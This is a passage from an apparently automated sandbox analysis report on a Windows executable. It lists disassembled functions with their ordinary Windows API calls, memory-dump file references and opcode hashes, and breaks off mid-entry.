                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 3668304517-0
                                                        • Opcode ID: bb6be96383f52cb4f395b1f6a57cbcdd71ddf4027480ffb8bb20c215771626c5
                                                        • Instruction ID: 045ccf2aee5326e5162afdb959995e6082cce403c2fffcf8865bce88735e6f28
                                                        • Opcode Fuzzy Hash: bb6be96383f52cb4f395b1f6a57cbcdd71ddf4027480ffb8bb20c215771626c5
                                                        • Instruction Fuzzy Hash: 3441E722A08E4A92FF10AF16E1E9379B361EB44BD4F841134DB6D077D9DE3DE480C6A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8F298 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                        • String ID:
                                                        • API String ID: 3947729631-0
                                                        • Opcode ID: ab316d70244085b37f1a9f180ae9f1a0cc75e686617e67bb2301c98a3afcfc25
                                                        • Instruction ID: 6ecefb6eea49641f35032fab7eb197e9ebb31070a0c2aaeff2be6e2b35f0db9d
                                                        • Opcode Fuzzy Hash: ab316d70244085b37f1a9f180ae9f1a0cc75e686617e67bb2301c98a3afcfc25
                                                        • Instruction Fuzzy Hash: 82417E31A1971683EB64BF17E8D0278B691BF84B40F95443ADB6D876D1EE3DE84183E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D74EAC Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF7F4D66288: FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D74FEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1011579015-0
                                                        • Opcode ID: 8084b25f1ea539e219eb19b22c1d55518661bfadae279eb0865322abd73152ad
                                                        • Instruction ID: 3413c5cc23fbe638b621f99b81ea15b6c6535f07a6827fe0bb99f3f5c14d1f84
                                                        • Opcode Fuzzy Hash: 8084b25f1ea539e219eb19b22c1d55518661bfadae279eb0865322abd73152ad
                                                        • Instruction Fuzzy Hash: B4314D21B19B8682EF15AF16E4D4379F391BF85790F804136DBAD07BD6CE2DE4408690
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D9469C Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 3215553584-0
                                                        • Opcode ID: 24a2bf5528e72f997332704ed263b4e8412e4d414351949a569fa1a370b6f0d0
                                                        • Instruction ID: 80ade92b49e3cff7c7f8fe7e166d57a32433e9e85ae673a50fbe7d034b067429
                                                        • Opcode Fuzzy Hash: 24a2bf5528e72f997332704ed263b4e8412e4d414351949a569fa1a370b6f0d0
                                                        • Instruction Fuzzy Hash: 57113D3291D68683E720AF12E880579B6A4FB44384FD50534E7AD87BD6DF2CE8508BE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D8372C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF7F4D82BB4: GetDlgItem.USER32 ref: 00007FF7F4D82BF3
                                                          • Part of subcall function 00007FF7F4D82BB4: ShowWindow.USER32 ref: 00007FF7F4D82C19
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C2E
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C46
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C67
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82C83
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82CC6
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82CE4
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82CF8
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82D22
                                                          • Part of subcall function 00007FF7F4D82BB4: IsDlgButtonChecked.USER32 ref: 00007FF7F4D82D3A
                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F4D837C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 4003826521-0
                                                        • Opcode ID: 5633ed455daab252bf95a002069b8d4be86d7d94b94103d075be587ea0f21ea8
                                                        • Instruction ID: ea343a2ef3fb314772cfdd9bb793d18b671661ac53aac37217b99f344d818163
                                                        • Opcode Fuzzy Hash: 5633ed455daab252bf95a002069b8d4be86d7d94b94103d075be587ea0f21ea8
                                                        • Instruction Fuzzy Hash: 9701A5A2A1568943EF14BB26D49637EB311FF89794F801731E7BC06BDADE2CE1408650
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D92E54 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: fdf7fba56cf0b327322f638254b73d498613de115c2495db529360746aa1fb94
                                                        • Instruction ID: 7bb774a3daf52091bdd11e50dd2050a4cbb42719fd717440f7b2cd9289f70ed8
                                                        • Opcode Fuzzy Hash: fdf7fba56cf0b327322f638254b73d498613de115c2495db529360746aa1fb94
                                                        • Instruction Fuzzy Hash: A0F0E754B0960787FF55BE63EDD12B5B3946F88B80F8858358B2EC63D1EE2CE58142B4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D66288 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00007FF7F4D6647C: FindFirstFileW.KERNELBASE ref: 00007FF7F4D664CB
                                                          • Part of subcall function 00007FF7F4D6647C: FindFirstFileW.KERNELBASE ref: 00007FF7F4D6651E
                                                          • Part of subcall function 00007FF7F4D6647C: GetLastError.KERNEL32 ref: 00007FF7F4D6656F
                                                        • FindClose.KERNELBASE(?,?,?,00007FF7F4D6FF61), ref: 00007FF7F4D662BD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: Find$FileFirst$CloseErrorLast
                                                        • String ID:
                                                        • API String ID: 1464966427-0
                                                        • Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                        • Instruction ID: c0cf74622f3e7a52c131ea54654bc0d0e94a0bca1ad78c3a892a1dbc18fccdcb
                                                        • Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                                        • Instruction Fuzzy Hash: 89F0F462908641D6EB10BF76E084178B7609F1ABB4F540335DB7C073CBCE18D484CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D90E1C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 3ac92b40718cceacc9b69195e34be5c37b2d5e73e97622ec344ecda480175592
                                                        • Instruction ID: 4a622917e394fc4ddc03276362817047434b3690f868e5fa3da3c6636e805499
                                                        • Opcode Fuzzy Hash: 3ac92b40718cceacc9b69195e34be5c37b2d5e73e97622ec344ecda480175592
                                                        • Instruction Fuzzy Hash: 77F0D410B0924787FB667E63FD81675B2805F88BA0F8806349B7EC62C1DE2CE48182B4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D642D0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7F4D6427E), ref: 00007FF7F4D642F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                        • Instruction ID: 40a6d5e793fbb47866d9cca252424f572258f0feae9108b54ff618e0c32bfa43
                                                        • Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                                        • Instruction Fuzzy Hash: 9DF0A422A48A46E6FF24DF26E481379B660EB04F79F895334D73C011D4DF28D8D583A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D700AC Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ItemMessageSend
                                                        • String ID:
                                                        • API String ID: 3015471070-0
                                                        • Opcode ID: 0d82525fd53c5026d2e0a34595dcb8d2fac7aee2738dc896d465c8e25a7063b1
                                                        • Instruction ID: 888352b280138e009982082ca56094ac0edc234bc9cdf0fd92ef6db6fb2f4ed7
                                                        • Opcode Fuzzy Hash: 0d82525fd53c5026d2e0a34595dcb8d2fac7aee2738dc896d465c8e25a7063b1
                                                        • Instruction Fuzzy Hash: 54D05E51F2964283E724BF13E499739A3107B96B84F900231CB5E1ABD1DE2DE21257D4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D68CF8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID:
                                                        • API String ID: 1611563598-0
                                                        • Opcode ID: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                        • Instruction ID: a78b9df928f09a9df00897874eb6c95b090df1c32100074f9a3fb09e694972ea
                                                        • Opcode Fuzzy Hash: b7b94b84bc736c81f561ac6a0213732948c79a519d47e0e60c8097fcab4ddeb2
                                                        • Instruction Fuzzy Hash: 50C08C20F02A02C3DB08AF27DCC911822A0BB91F04FA08034D31CC11A0DE2CC4EA87A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D64E00 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: File
                                                        • String ID:
                                                        • API String ID: 749574446-0
                                                        • Opcode ID: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                        • Instruction ID: f1f14e4f4862ca50e3450f4c57accc3929e170b2581368d9949e3209c3544f75
                                                        • Opcode Fuzzy Hash: 18013ed5b6161e60d067ba1f4f2b62e7c051905d9142b67b1a2e10f00f48d8d5
                                                        • Instruction Fuzzy Hash: 0EB09210B03545C2D704AB23DCC21186325BB89B41BD94430C61DD1260DE1CC8EB9700
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00007FF7F4D6E8D8 Relevance: 43.2, APIs: 22, Strings: 2, Instructions: 1205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastLoadString$Concurrency::cancel_current_taskInit_thread_footer
                                                        • String ID: %ls$%s: %s
                                                        • API String ID: 2539828978-2259941744
                                                        • Opcode ID: 8509f953a3f888072089c06e54905e895ae12183c162526f6ecee7f108d2818a
                                                        • Instruction ID: eeaf8d85137bf525f1e9d53041e441ab017b1d408b5032090d1fa23e20fe07b6
                                                        • Opcode Fuzzy Hash: 8509f953a3f888072089c06e54905e895ae12183c162526f6ecee7f108d2818a
                                                        • Instruction Fuzzy Hash: 93B2A562A19A8293EB14BF26D4D41BEF315FFC5790F80423AE7AD437D6EE2CD5408690
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D959A0 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfomemcpy_s
                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                        • API String ID: 1759834784-2761157908
                                                        • Opcode ID: 8c7d82894d3eb9af29d7ef01237fe728618e392c192ac46bfd7fd60c8d4d3354
                                                        • Instruction ID: 6729a88cfdb88ab886ed91f7747c6ff8043c339f6b9e6eafc3161d6b15fbb143
                                                        • Opcode Fuzzy Hash: 8c7d82894d3eb9af29d7ef01237fe728618e392c192ac46bfd7fd60c8d4d3354
                                                        • Instruction Fuzzy Hash: 2CB20B72A081828BE765AE66DC906FDB791FB4438CF905135DB2997BC4DF38E504CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00007FF7F4D672AC Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                        • String ID:
                                                        • API String ID: 1693479884-0
                                                        • Opcode ID: ea4125342bd4bac1772d1d8899cdb601593b7fbe57cae896892b32ae53872223
